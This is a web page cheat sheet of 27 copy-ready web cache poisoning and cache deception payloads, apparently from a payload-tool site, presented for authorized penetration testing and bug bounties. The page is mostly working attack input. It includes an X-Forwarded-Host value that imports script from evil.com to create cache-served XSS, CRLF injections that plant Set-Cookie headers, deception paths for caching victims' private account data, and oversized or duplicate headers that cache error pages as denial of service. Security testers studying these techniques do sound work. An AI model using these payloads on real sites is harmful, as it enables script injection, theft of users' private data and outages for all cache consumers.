Web Cache Poisoning Cheat Sheet

Copy-ready HTTP header payloads and techniques for finding and exploiting web cache poisoning and cache deception during authorized testing. (27 payloads)

Build custom Cache Poisoning payloads in the Web Cache Poisoning generator

Unkeyed Header Inputs

(7)

X-Forwarded-Host: evil-attacker.com

Classic unkeyed input. If the host is reflected into an absolute URL (links, imports, redirects) but excluded from the cache key, the poisoned response is served to other users. Watch for reflection in <script src>, <link href>, Location, or canonical tags.Reverse proxies / CDNs that trust X-Forwarded-Host

X-Forwarded-Host: evil.com"><script>import('//evil.com/x.js')</script>

Combines unkeyed XFH reflection with HTML/JS injection. If the value lands in an HTML attribute or script context, this escalates a reflected XSS into a stored, cache-served XSS hitting every cache consumer.XFH reflected unsanitized into HTML body

X-Host: evil-attacker.com

Alternative host-override header consumed by some frameworks/CDNs (e.g. older Akamai, custom proxies). Test alongside X-Forwarded-Host when the canonical header is keyed or filtered.Akamai / custom origin configs

X-Forwarded-Scheme: http

When set to http, some back-ends issue an HTTPS redirect to the requested host. Pairing X-Forwarded-Scheme: http with X-Forwarded-Host points the cached redirect at an attacker domain.Send together with X-Forwarded-Host: evil.com

X-Forwarded-Proto: http

Equivalent scheme-override header (more widely supported than X-Forwarded-Scheme). Used to trigger an unkeyed protocol-based redirect that gets cached.Nginx / many app frameworks

X-Forwarded-Server: evil-attacker.com

Less common host-override header read by some Apache/proxy stacks. Probe it when XFH and X-Host are filtered but virtual-host routing still trusts forwarded data.Apache mod_proxy chains

X-Original-URL: /admin

Unkeyed routing override consumed by some servers (notably IIS / Symfony). Can rewrite the served path while the cache key stays the original URL, poisoning the cached entry for that path or exposing internal routes.IIS, Symfony front controllers

Cache-Key Probing & Discovery

(6)

GET /?cb=zxcv1 HTTP/1.1
X-Forwarded-Host: canary123.attacker.com

Always probe with a unique cache buster (cb param or random path) so you poison only your own key during testing and never serve a poisoned page to real users. Confirm reflection, then drop the buster to weaponize.Mandatory safety step for authorized testing

Pragma: no-cache

Forces a fresh, uncached response from origin so you can verify the back-end actually reflects your candidate header before reasoning about cache behaviour. Compare reflected vs cached output.Origin-fetch verification

GET / HTTP/1.1
Host: target.com
Foo: bar123

Header-by-header probing for unkeyed inputs: add a guess header, then re-request without it. If the reflected/changed value persists on the second clean request, that header is unkeyed and cacheable. Param Miner automates this.Identifying unkeyed inputs

GET /?utm_source=test HTTP/1.1

Probe for unkeyed query parameters. If utm_*/fbclid-style params are excluded from the cache key but still reflected (e.g. in canonical links or analytics), they become a poisoning vector with no header control needed.Unkeyed query params

Vary: User-Agent

Inspect the response Vary header to map which inputs are keyed. Inputs absent from Vary (and from the URL/Host) are candidate unkeyed vectors. A narrow Vary widens your attack surface.Read response header to map the key

Accept-Encoding: gzip, deflate, br, identity, zs7d9

Fat GET / encoding fuzzing to detect cache-key normalization quirks and inconsistent parsing between cache and origin, which can split or merge cache entries unexpectedly.Cache vs origin parser discrepancy

Web Cache Deception

(5)

GET /account/profile/nonexistent.css HTTP/1.1

Web Cache Deception (Gilad Shwartz / Omer Gil). Appending a static-looking extension to a dynamic authenticated path can make the CDN cache the personalized response. The attacker then fetches the same URL to read the victim's cached private data.CDN caches by extension; origin ignores suffix

GET /api/me/wcd.js HTTP/1.1

Variant targeting JSON/API endpoints that return user data. If the cache rule matches *.js and the origin serves the same body regardless of suffix, the response containing tokens/PII gets cached publicly.API returns same body for any path suffix

GET /settings/foo%2e%2e%2fbar.css HTTP/1.1

Path-delimiter confusion. Encoded traversal/delimiters (%2f, %2e, %3f, %23, ;) are interpreted differently by cache vs origin, letting a 'static' URL map to a dynamic resource the cache will store.Cache/origin path-normalization mismatch

GET /account%00.css HTTP/1.1

Null-byte / delimiter trick: cache truncates or treats the URL as a static asset while the origin serves the dynamic /account page, caching authenticated content.Delimiter-parsing discrepancy

GET /account.css?x=1 HTTP/1.1

Some caches strip the extension or honor it regardless of query string. Combining a static suffix with a path the origin resolves dynamically can satisfy the cache's static-asset rule.Extension-based cache rules

Response-Splitting & Header DoS

(5)

X-Forwarded-Host: evil.com%0d%0aSet-Cookie:%20poison=1

CRLF injection (%0d%0a) via a reflected/unkeyed header. If the value is written into a response header unsanitized, you can inject Set-Cookie or split the response. When the result is cached, the malicious header is served to all consumers (cache-persisted HTTP response splitting).Header value reflected into response headers

GET /?lang=en%0d%0aContent-Length:%200%0d%0a%0d%0a HTTP/1.1

Response-splitting via a reflected, unkeyed query parameter. A successful split lets you craft a second response body that the cache stores against the original key, poisoning it for every user.Param reflected into Location/header

X-Metadata-Header: AAAAAAAA...[~8KB of A's]...AAAA

Cache-poisoning DoS (CPDoS) HTTP Header Oversize (HHO). An oversized header is accepted by the cache but rejected by a stricter origin, which returns an error page the cache stores and serves to legitimate users.Cache limit > origin limit (HHO variant)

X-Forwarded-Host: a.com
X-Forwarded-Host: b.com

CPDoS HTTP Meta Character (HMC) / duplicate-header confusion. Sending malformed or duplicate forwarded headers causes the origin to emit a cached 400/error, denying service for that cache key.HMC / duplicate-header CPDoS

X-Forwarded-Host: target.com\n\rEvil

CPDoS HTTP Method Override / metacharacter injection. Control or meta characters that the cache forwards but the origin treats as an error trigger a cached error response for the keyed resource.Cached 400/403/404 denial

Parameter Cloaking & Internal Cache

(4)

GET /?keyed=1;excluded_param=cachebuster HTTP/1.1

Parameter cloaking. The cache treats the value after a semicolon as part of one keyed parameter, while the origin parses it as a separate excluded parameter. This hides an unkeyed input inside a keyed one for poisoning.Ruby on Rails / parsers that split on ;

GET /?callback=poison;utm_content=x HTTP/1.1

Cloaks a dangerous reflected parameter (e.g. JSONP callback) behind a semicolon inside an excluded tracking param so the cache stores the response, weaponizing an otherwise unkeyed/reflected value.JSONP / callback reflection

GET /?utm_source=x&utm_source=evil HTTP/1.1

Duplicate-parameter cloaking. Cache and origin disagree on which value of a repeated parameter wins (first vs last), letting an excluded duplicate carry the malicious payload into a cached response.First-vs-last param precedence mismatch

GET /js/app.js?cb=1 HTTP/1.1
X-Forwarded-Host: evil.com

Internal cache poisoning chained to imports. Poison a cached JS/JSON resource that other pages import; the malicious host then propagates into dynamic dependencies (e.g. resource loaders), broadening impact beyond a single page.Poisoned static asset imported site-wide

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Web Cache Poisoning

Related Cheat Sheets

Open Redirect Cheat Sheet CRLF Injection Cheat Sheet HTTP Request Smuggling Cheat Sheet

Frequently asked questions

What is the Web Cache Poisoning Cheat Sheet?+

It's a quick-reference collection of 27 Cache Poisoning payloads for testing Web Cache Poisoning vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Cache Poisoning payloads?+

Copy any payload straight into your authorized test, or open the Web Cache Poisoning generator to build customized Cache Poisoning variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these Cache Poisoning payloads free to use?+

Yes — this cheat sheet and all Cache Poisoning payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Web Cache Poisoning Cheat Sheet?+

How do I use these Cache Poisoning payloads?+

Are these Cache Poisoning payloads free to use?+

Yes — this cheat sheet and all Cache Poisoning payloads are completely free, with no account required. Everything runs in your browser.